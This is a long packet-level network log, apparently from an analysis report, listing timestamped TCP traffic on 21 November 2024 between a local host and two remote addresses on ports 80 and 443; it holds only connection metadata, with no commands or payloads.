                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.780363083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.781290054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.781343937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.781544924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.781595945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.782402039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.782558918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.782589912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.782624006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.783443928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.783497095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.783551931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.783598900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.784574032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.784625053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.784691095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.784735918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.785630941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.785681963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840179920 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840379000 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840437889 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840575933 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840609074 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840636015 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.840650082 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.844098091 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.844146013 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.844233036 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.844425917 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.844445944 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849652052 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849726915 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849798918 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849896908 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849898100 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849939108 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.849965096 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.852287054 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.852317095 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.852381945 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.852495909 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.852504969 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.939385891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.939543009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.939603090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.939625025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.939882994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.939941883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.940004110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.940064907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.940989017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.941061974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.941096067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.941143036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.942106009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.942176104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.942255974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.943164110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.943280935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.943471909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.943547964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.944236994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.944314003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.944314957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.944375038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.945441008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.945497990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.945532084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.945584059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.946424007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.946484089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.946851969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.946919918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.949291945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.949309111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.949325085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.949342012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.949369907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.949425936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.950143099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.950159073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.950205088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.951029062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.951088905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.951114893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.951169014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.952042103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.952120066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.952235937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.952311993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.953016043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.953044891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.953077078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.953093052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.954061985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.954121113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.954184055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.954233885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955184937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955246925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955287933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955347061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955560923 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955626965 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955698967 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955915928 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955941916 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955974102 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.955981970 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.956302881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.956361055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.956367016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.956404924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.957314014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.957380056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.957427025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.957477093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.958394051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.958455086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.958579063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.958643913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959465027 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959507942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959543943 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959569931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959603071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959629059 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959649086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959861040 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.959893942 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.960580111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.960633993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.960675001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.960724115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.961680889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.961745024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.961807966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.961855888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.964920044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.964936018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.964952946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.964970112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.964984894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.965030909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.965092897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.965209007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.965225935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.965264082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.965275049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.966372967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.966428995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.966521978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.966573954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.967609882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.967694044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.967767954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.967818975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.968616009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.968668938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.968799114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.968875885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.969386101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.969446898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.969549894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.969604969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.970663071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.970679045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.970717907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.970736980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.971492052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.971550941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.971594095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.971658945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.972587109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.972662926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.972678900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.972754002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.973681927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.973741055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.973767042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.973815918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.974773884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.974797964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.974845886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.975857973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.975918055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.975944042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.975991964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.976943970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.976996899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.977055073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.977106094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.978039980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.978101969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.978136063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.978178978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.979129076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.979182959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.979216099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.979264021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.980200052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.980251074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.980288982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.980335951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.981304884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.981357098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.981429100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.981482029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.982404947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.982467890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.982831001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.982904911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.983515978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.983561039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.983593941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.983640909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.984539986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.984590054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.984652042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.984702110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.985635996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.985683918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.985743999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.985795975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.986721039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.986771107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.986852884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.986900091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.987838984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.987896919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.987929106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.987982035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.989090919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.989145994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.989211082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.989267111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.990024090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.990077972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.990111113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.990155935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.991076946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.991133928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.991182089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.991234064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994508982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994524956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994540930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994558096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994565010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994574070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994580984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994589090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994622946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.994637012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.995841980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.995891094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.995974064 CET804977031.41.244.11192.168.2.4
